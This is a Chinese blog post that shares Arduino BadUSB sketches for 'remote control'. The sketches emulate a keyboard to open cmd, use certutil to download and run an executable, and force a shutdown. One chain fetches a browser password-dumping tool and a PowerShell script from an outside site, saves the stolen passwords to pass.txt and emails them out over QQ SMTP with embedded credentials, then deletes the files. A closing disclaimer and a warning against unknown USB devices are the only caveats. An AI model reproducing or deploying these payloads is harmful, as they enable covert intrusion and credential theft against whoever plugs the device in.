• 欢迎访问本站网站,推荐使用最新版火狐浏览器和Chrome浏览器访问本网站,如果您觉得本站非常有看点,那么赶紧使用Ctrl+D 收藏吧

badusb代码分享实现远程控制

综合社区 admin 3个月前 (10-20) 445次浏览 已收录 1个评论 扫描二维码
需要用到烧录工具Arduino
        Arduino IDE工具下载:https://www.arduino.cn/thread-5838-1-1.html
打开Arduino选择“工具”—>”开发板”—–>”Arduino Leonaedo”,选择badusb设备的”端口”

烧录

烧录前选择好自己的板和端口,点击左上角的✔ 验证代码的完整性,点击旁边的上传按钮将代码烧录到badusb设备。
#include<Keyboard.h>
void setup()
{
  Keyboard.begin();//初始化键盘通讯
  delay(5000);//延时
  Keyboard.press(KEY_LEFT_GUI);//win键
  Keyboard.press('r');//r键
  delay(500);
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  Keyboard.press(KEY_CAPS_LOCK);//利用开大写输小写绕过输入法
  Keyboard.release(KEY_CAPS_LOCK);
  delay(500);
  Keyboard.println("CMD");
  delay(1000);
  Keyboard.println("certutil -urlcache -split -f http://172.20.10.3:8000/xxxxx.EXE F:\\setup_11.5.0.exe");//由于开启了大写锁定,所有需要把大小写写颠倒,//下载远程的payload
  delay(1000);
  Keyboard.println("F:\\SETUP_11.5.0.EXE");
  delay(500);
  Keyboard.println("EXIT");
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.end();//结束键盘通讯
}
void loop() {}

关机代码:
#include <Keyboard.h>
void setup() {
  // put your setup code here, to run once:
  Keyboard.begin();//开始键盘通讯
  delay(5000);//延时
  Keyboard.press(KEY_CAPS_LOCK);//开启大写锁
  Keyboard.release(KEY_CAPS_LOCK);
  delay(50);
  Keyboard.press(KEY_LEFT_GUI);//win键
  delay(500);
  Keyboard.press('r');//r键
  delay(500);
  Keyboard.release(KEY_LEFT_GUI);//按住win+R
  Keyboard.release('r');
  Keyboard.print("cmd");//输入cmd
  Keyboard.press(KEY_RETURN);
  Keyboard.release(KEY_RETURN);//回车
  delay(500);
  Keyboard.print("shutdown -s -t 0");//关机
  Keyboard.press(KEY_RETURN);
  Keyboard.release(KEY_RETURN);//回车
  Keyboard.end();
}
void loop() {
  // put your main code here, to run repeatedly:

}

 

永远不要低估人类愚蠢的好奇心
不要随便接入他人的USB设备,永远不要相信第三方的设备

发送邮件

无法运行ps1脚本时需要管理员方式运行powershell然后输入:set-ExecutionPolicy RemoteSigned
$SMTPServer = 'smtp.qq.com'
$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
$SMTPInfo.EnableSsl = $true
$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('xxxxx@qq.com', 'mkxkjtgfycigjjd');
$ReportEmail = New-Object System.Net.Mail.MailMessage
$ReportEmail.From = 'xxxxxxx@qq.com'
$ReportEmail.To.Add('xxxxxxx@qq.com')
$ReportEmail.Subject = 'GetPass'
$ReportEmail.Body = 'Passwords In Applications'
$ReportEmail.Attachments.Add('F:\pass.txt')
$SMTPInfo.Send($ReportEmail)
attrib +h pass.txt

下载代码

#include<Keyboard.h>
void setup()
{
  Keyboard.begin();//初始化键盘通讯
  delay(5000);//延时
  Keyboard.press(KEY_LEFT_GUI);//win键
  Keyboard.press('r');//r键
  delay(500);
  Keyboard.release(KEY_LEFT_GUI);
  Keyboard.release('r');
  Keyboard.press(KEY_CAPS_LOCK);//利用开大写输小写绕过输入法
  Keyboard.release(KEY_CAPS_LOCK);
  delay(500);
  Keyboard.println("CMD");
  delay(1000);
  Keyboard.println("certutil -urlcache -split -f HTTP://WWW.DDOSLINUX.COM/C/PASSTOOLS.EXE f:\\setup_11.5.0.exe");//下载密码截取工具
  delay(1000);
  Keyboard.println("certutil -urlcache -split -f HTTP://WWW.DDOSLINUX.COM/C/PASS.PS1 f:\\setup_11.5.0.PS1");//下载powershell脚本
  delay(1000);
  Keyboard.println("f:\\SETUP_11.5.0.EXE BROWSERS > f:\\pass.txt");//获取的密码放到pass.txt
  delay(500);
  Keyboard.println("POWERSHELL f:\\SETUP_11.5.0.PS1");
  Keyboard.println("DEL f:\\pass.txt,f:\\setup_11.5.0.PS1,f:\\setup_11.5.0.exe");//删除程序
  Keyboard.println("EXIT");//退出powershell
  Keyboard.println("EXIT");//退出cmd
  Keyboard.press(KEY_CAPS_LOCK);
  Keyboard.release(KEY_CAPS_LOCK);
  Keyboard.end();//结束键盘通讯
}
void loop() {}

badusb代码分享实现远程控制

免责声明
与本站提供的代码或者工具从事任何有关违法犯罪行为或活动的仅由您自己承担。滥用本网站上的信息可能会导致,有关人员提起刑事诉讼。如果对滥用本工具中的信息以从事违法犯罪行为,被追究责任的后果自负,作者将不承担任何责任。
编写此类文章的目的是为了介绍我们网络中的一些黑客攻击方法和被攻击后的现象来让大家认识到网络攻击究竟是怎样的,以此来加强大家的识别能力从而保护自己虚拟财产的安全,学技术不是为了搞破坏,而是为了更好的去保护我们祖国的网络安全!


本站的文章和资源来自互联网或者站长的原创丨本网站采用BY-NC-SA协议进行授权
转载请注明原文链接:badusb代码分享实现远程控制
喜欢 (2)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
(1)个小伙伴在吐槽
  1. 邪恶的USB设备
    IE2020-10-20 22:44 回复